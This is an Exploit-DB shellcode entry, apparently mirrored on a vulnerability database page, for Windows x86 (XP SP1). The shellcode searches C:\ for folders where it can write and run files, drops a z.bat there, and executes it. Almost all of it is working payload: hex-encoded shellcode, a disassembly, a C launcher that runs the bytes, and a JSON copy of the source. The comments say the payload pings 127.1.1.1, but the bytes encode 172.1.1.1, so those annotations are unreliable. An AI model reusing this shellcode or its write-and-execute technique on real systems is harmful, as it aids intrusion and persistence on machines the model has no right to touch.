Search...

Windows x86 - Executable Directory Search Shellcode (130 bytes)

2017-02-26T00:00:00

ID EDB-ID:41467
Type exploitdb
Reporter Exploit-DB
Modified 2017-02-26T00:00:00

Description

Windows x86 - Executable Directory Search Shellcode (130 bytes). Shellcode exploit for Win_x86 platform

                                        
                                            # Title: Windows x86 - Executable directory search Shellcode (130 bytes)
# Date: 26-02-2017
# Author: Krzysztof Przybylski
# Platform: Win_x86
# Tested on: WinXP SP1
# Shellcode Size: 130 bytes

/*
Description: 
write & exec dir searcher
starts from C:\
If dir found then write, execute (ping 127.1.1.1) and exit
If Write/noexec dir found then continue

Tested on WinXP SP1 (77e6fd35;77e798fd)
i686-w64-mingw32-gcc shell.c -o golddgger.exe

Null-free version:

(gdb) disassemble 
Dump of assembler code for function function:
=&gt; 0x08048062 &lt;+0&gt;:	pop    ecx
   0x08048063 &lt;+1&gt;:	xor    eax,eax
   0x08048065 &lt;+3&gt;:	mov    BYTE PTR [ecx+0x64],al
   0x08048068 &lt;+6&gt;:	push   eax
   0x08048069 &lt;+7&gt;:	push   ecx
   0x0804806a &lt;+8&gt;:	mov    eax,0x77e6fd35
   0x0804806f &lt;+13&gt;:	call   eax
   0x08048071 &lt;+15&gt;:	xor    eax,eax
   0x08048073 &lt;+17&gt;:	push   eax
   0x08048074 &lt;+18&gt;:	mov    eax,0x77e798fd
   0x08048079 &lt;+23&gt;:	call   eax


NULL-free shellcode (132 bytes):

"\xeb\x19\x59\x31\xc0\x88\x41\x64"
"\x50\x51\xb8"
"\x35\xfd\xe6\x77"                      // exec
"\xff\xd0\x31\xc0\x50\xb8"
"\xfd\x98\xe7\x77"                      // exit
"\xff\xd0\xe8\xe2\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20"
"\x2f\x43\x20\x22\x28\x63\x64\x20"
"\x63\x3a\x5c"                          // C:\
"\x20\x26\x46\x4f\x52"
"\x20\x2f\x44\x20\x2f\x72\x20\x25"
"\x41\x20\x49\x4e\x20\x28\x2a\x29"
"\x20\x44\x4f\x20"
"\x65\x63\x68\x6f\x20"
"\x70\x69\x6e\x67\x20"                  
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"  // 127.1.1.1
"\x3e\x22\x25\x41\x5c\x7a\x2e\x62"
"\x61\x74\x22\x26\x28\x63\x61\x6c"
"\x6c\x20\x22\x25\x41\x5c\x7a\x2e"
"\x62\x61\x74\x22\x26\x26\x65\x78"
"\x69\x74\x29\x29\x22";

*/
// NULL version (130 bytes):

char code[] = 
"\xeb\x16\x59\x31\xc0\x50\x51\xb8"
"\x35\xfd\xe6\x77"                 	// exec
"\xff\xd0\x31\xc0\x50\xb8"
"\xfd\x98\xe7\x77"                  	// exit
"\xff\xd0\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f"
"\x43\x20\x22\x28\x63\x64\x20"
"\x63\x3a\x5c"                      	// C:\
"\x20\x26\x46\x4f\x52\x20\x2f\x44"
"\x20\x2f\x72\x20\x25\x41\x20\x49"
"\x4e\x20\x28\x2a\x29\x20\x44\x4f"
"\x20\x65\x63\x68\x6f\x20\x70\x69"
"\x6e\x67\x20"
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"	// 127.1.1.1 
"\x3e\x22\x25\x41"
"\x5c\x7a\x2e\x62\x61\x74\x22\x26"
"\x28\x63\x61\x6c\x6c\x20\x22\x25"
"\x41\x5c\x7a\x2e\x62\x61\x74\x22"
"\x26\x26\x65\x78\x69\x74\x29\x29"
"\x22\x00";

int main(int argc, char **argv)

{
        int (*func)();
        func = (int (*)()) code;
        (int)(*func)();
}

JSON Vulners Source

Initial Source

{"id": "EDB-ID:41467", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Windows x86 - Executable Directory Search Shellcode (130 bytes)", "description": "Windows x86 - Executable Directory Search Shellcode (130 bytes). Shellcode exploit for Win_x86 platform", "published": "2017-02-26T00:00:00", "modified": "2017-02-26T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://www.exploit-db.com/exploits/41467/", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2017-02-27T11:11:10", "viewCount": 20, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2017-02-27T11:11:10", "rev": 2}, "dependencies": {"references": [], "modified": "2017-02-27T11:11:10", "rev": 2}, "vulnersScore": -0.1}, "sourceHref": "https://www.exploit-db.com/download/41467/", "sourceData": "# Title: Windows x86 - Executable directory search Shellcode (130 bytes)\r\n# Date: 26-02-2017\r\n# Author: Krzysztof Przybylski\r\n# Platform: Win_x86\r\n# Tested on: WinXP SP1\r\n# Shellcode Size: 130 bytes\r\n\r\n/*\r\nDescription: \r\nwrite & exec dir searcher\r\nstarts from C:\\\r\nIf dir found then write, execute (ping 127.1.1.1) and exit\r\nIf Write/noexec dir found then continue\r\n\r\nTested on WinXP SP1 (77e6fd35;77e798fd)\r\ni686-w64-mingw32-gcc shell.c -o golddgger.exe\r\n\r\nNull-free version:\r\n\r\n(gdb) disassemble \r\nDump of assembler code for function function:\r\n=> 0x08048062 <+0>:\tpop ecx\r\n 0x08048063 <+1>:\txor eax,eax\r\n 0x08048065 <+3>:\tmov BYTE PTR [ecx+0x64],al\r\n 0x08048068 <+6>:\tpush eax\r\n 0x08048069 <+7>:\tpush ecx\r\n 0x0804806a <+8>:\tmov eax,0x77e6fd35\r\n 0x0804806f <+13>:\tcall eax\r\n 0x08048071 <+15>:\txor eax,eax\r\n 0x08048073 <+17>:\tpush eax\r\n 0x08048074 <+18>:\tmov eax,0x77e798fd\r\n 0x08048079 <+23>:\tcall eax\r\n\r\n\r\nNULL-free shellcode (132 bytes):\r\n\r\n\"\\xeb\\x19\\x59\\x31\\xc0\\x88\\x41\\x64\"\r\n\"\\x50\\x51\\xb8\"\r\n\"\\x35\\xfd\\xe6\\x77\" // exec\r\n\"\\xff\\xd0\\x31\\xc0\\x50\\xb8\"\r\n\"\\xfd\\x98\\xe7\\x77\" // exit\r\n\"\\xff\\xd0\\xe8\\xe2\\xff\\xff\\xff\"\r\n\"\\x63\\x6d\\x64\\x2e\\x65\\x78\\x65\\x20\"\r\n\"\\x2f\\x43\\x20\\x22\\x28\\x63\\x64\\x20\"\r\n\"\\x63\\x3a\\x5c\" // C:\\\r\n\"\\x20\\x26\\x46\\x4f\\x52\"\r\n\"\\x20\\x2f\\x44\\x20\\x2f\\x72\\x20\\x25\"\r\n\"\\x41\\x20\\x49\\x4e\\x20\\x28\\x2a\\x29\"\r\n\"\\x20\\x44\\x4f\\x20\"\r\n\"\\x65\\x63\\x68\\x6f\\x20\"\r\n\"\\x70\\x69\\x6e\\x67\\x20\" \r\n\"\\x31\\x37\\x32\\x2e\\x31\\x2e\\x31\\x2e\\x31\" // 127.1.1.1\r\n\"\\x3e\\x22\\x25\\x41\\x5c\\x7a\\x2e\\x62\"\r\n\"\\x61\\x74\\x22\\x26\\x28\\x63\\x61\\x6c\"\r\n\"\\x6c\\x20\\x22\\x25\\x41\\x5c\\x7a\\x2e\"\r\n\"\\x62\\x61\\x74\\x22\\x26\\x26\\x65\\x78\"\r\n\"\\x69\\x74\\x29\\x29\\x22\";\r\n\r\n*/\r\n// NULL version (130 bytes):\r\n\r\nchar code[] = \r\n\"\\xeb\\x16\\x59\\x31\\xc0\\x50\\x51\\xb8\"\r\n\"\\x35\\xfd\\xe6\\x77\" \t// exec\r\n\"\\xff\\xd0\\x31\\xc0\\x50\\xb8\"\r\n\"\\xfd\\x98\\xe7\\x77\" \t// exit\r\n\"\\xff\\xd0\\xe8\\xe5\\xff\\xff\\xff\\x63\"\r\n\"\\x6d\\x64\\x2e\\x65\\x78\\x65\\x20\\x2f\"\r\n\"\\x43\\x20\\x22\\x28\\x63\\x64\\x20\"\r\n\"\\x63\\x3a\\x5c\" \t// C:\\\r\n\"\\x20\\x26\\x46\\x4f\\x52\\x20\\x2f\\x44\"\r\n\"\\x20\\x2f\\x72\\x20\\x25\\x41\\x20\\x49\"\r\n\"\\x4e\\x20\\x28\\x2a\\x29\\x20\\x44\\x4f\"\r\n\"\\x20\\x65\\x63\\x68\\x6f\\x20\\x70\\x69\"\r\n\"\\x6e\\x67\\x20\"\r\n\"\\x31\\x37\\x32\\x2e\\x31\\x2e\\x31\\x2e\\x31\"\t// 127.1.1.1 \r\n\"\\x3e\\x22\\x25\\x41\"\r\n\"\\x5c\\x7a\\x2e\\x62\\x61\\x74\\x22\\x26\"\r\n\"\\x28\\x63\\x61\\x6c\\x6c\\x20\\x22\\x25\"\r\n\"\\x41\\x5c\\x7a\\x2e\\x62\\x61\\x74\\x22\"\r\n\"\\x26\\x26\\x65\\x78\\x69\\x74\\x29\\x29\"\r\n\"\\x22\\x00\";\r\n\r\nint main(int argc, char **argv)\r\n\r\n{\r\n int (*func)();\r\n func = (int (*)()) code;\r\n (int)(*func)();\r\n}\r\n", "osvdbidlist": []}